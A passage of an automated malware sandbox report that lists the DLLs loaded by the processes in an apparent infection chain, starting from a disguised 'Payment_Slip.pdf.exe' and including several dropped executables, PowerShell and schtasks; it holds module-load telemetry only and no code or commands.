                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: winmm.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeSection loaded: dwrite.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeSection loaded: textshaping.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeSection loaded: riched20.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeSection loaded: usp10.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeSection loaded: msls31.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeSection loaded: windowscodecs.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeSection loaded: iconcodecservice.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeSection loaded: urlmon.dll
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeSection loaded: iertutil.dll
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeSection loaded: srvcli.dll
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeSection loaded: netutils.dll
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Roaming\host.exeSection loaded: mscoree.dll
                              Source: C:\Users\user\AppData\Roaming\host.exeSection loaded: apphelp.dll
                              Source: C:\Users\user\AppData\Roaming\host.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Roaming\host.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Roaming\host.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Users\user\AppData\Roaming\host.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\AppData\Roaming\host.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\AppData\Roaming\host.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Roaming\host.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Roaming\host.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Roaming\host.exeSection loaded: profapi.dll
                              Source: C:\Users\user\AppData\Roaming\host.exeSection loaded: cryptsp.dll
                              Source: C:\Users\user\AppData\Roaming\host.exeSection loaded: rsaenh.dll
                              Source: C:\Users\user\AppData\Roaming\host.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\AppData\Roaming\host.exeSection loaded: wbemcomn.dll
                              Source: C:\Users\user\AppData\Roaming\host.exeSection loaded: amsi.dll
                              Source: C:\Users\user\AppData\Roaming\host.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Roaming\host.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\AppData\Roaming\host.exeSection loaded: rasapi32.dll
                              Source: C:\Users\user\AppData\Roaming\host.exeSection loaded: rasman.dll
                              Source: C:\Users\user\AppData\Roaming\host.exeSection loaded: rtutils.dll
                              Source: C:\Users\user\AppData\Roaming\host.exeSection loaded: mswsock.dll
                              Source: C:\Users\user\AppData\Roaming\host.exeSection loaded: winhttp.dll
                              Source: C:\Users\user\AppData\Roaming\host.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Users\user\AppData\Roaming\host.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Roaming\host.exeSection loaded: dhcpcsvc6.dll
                              Source: C:\Users\user\AppData\Roaming\host.exeSection loaded: dhcpcsvc.dll
                              Source: C:\Users\user\AppData\Roaming\host.exeSection loaded: dnsapi.dll
                              Source: C:\Users\user\AppData\Roaming\host.exeSection loaded: winnsi.dll
                              Source: C:\Users\user\AppData\Roaming\host.exeSection loaded: rasadhlp.dll
                              Source: C:\Users\user\AppData\Roaming\host.exeSection loaded: fwpuclnt.dll
                              Source: C:\Users\user\AppData\Roaming\host.exeSection loaded: secur32.dll
                              Source: C:\Users\user\AppData\Roaming\host.exeSection loaded: schannel.dll
                              Source: C:\Users\user\AppData\Roaming\host.exeSection loaded: mskeyprotect.dll
                              Source: C:\Users\user\AppData\Roaming\host.exeSection loaded: ntasn1.dll
                              Source: C:\Users\user\AppData\Roaming\host.exeSection loaded: ncrypt.dll
                              Source: C:\Users\user\AppData\Roaming\host.exeSection loaded: ncryptsslp.dll
                              Source: C:\Users\user\AppData\Roaming\host.exeSection loaded: msasn1.dll
                              Source: C:\Users\user\AppData\Roaming\host.exeSection loaded: gpapi.dll
                              Source: C:\Users\user\AppData\Roaming\host.exeSection loaded: ntmarta.dll
                              Source: C:\Users\user\AppData\Roaming\host.exeSection loaded: edputil.dll
                              Source: C:\Users\user\AppData\Roaming\host.exeSection loaded: vaultcli.dll
                              Source: C:\Users\user\AppData\Roaming\host.exeSection loaded: wintypes.dll
                              Source: C:\Users\user\AppData\Roaming\host.exeSection loaded: windowscodecs.dll
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeSection loaded: mscoree.dll
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeSection loaded: apphelp.dll
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeSection loaded: profapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeSection loaded: cryptsp.dll
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeSection loaded: rsaenh.dll
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeSection loaded: wbemcomn.dll
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeSection loaded: amsi.dll
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeSection loaded: sxs.dll
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeSection loaded: ntmarta.dll
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeSection loaded: dpapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeSection loaded: vaultcli.dll
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeSection loaded: wintypes.dll
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeSection loaded: dnsapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeSection loaded: dhcpcsvc6.dll
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeSection loaded: dhcpcsvc.dll
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeSection loaded: winnsi.dll
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeSection loaded: mswsock.dll
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeSection loaded: rasadhlp.dll
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeSection loaded: fwpuclnt.dll
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeSection loaded: secur32.dll
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeSection loaded: schannel.dll
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeSection loaded: mskeyprotect.dll
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeSection loaded: ntasn1.dll
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeSection loaded: ncrypt.dll
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeSection loaded: ncryptsslp.dll
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeSection loaded: msasn1.dll
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeSection loaded: edputil.dll
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeSection loaded: windowscodecs.dll
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: version.dll
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: wininet.dll
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: wldp.dll
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: iertutil.dll
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: profapi.dll
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: cryptsp.dll
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: rsaenh.dll
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: pstorec.dll
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: vaultcli.dll
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: wintypes.dll
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: dpapi.dll
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: msasn1.dll
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: wldp.dll
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: pstorec.dll
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: msasn1.dll
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: msasn1.dll
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: wldp.dll
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: msasn1.dll
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: cryptsp.dll
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: rsaenh.dll
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeSection loaded: apphelp.dll
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeSection loaded: urlmon.dll
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeSection loaded: iertutil.dll
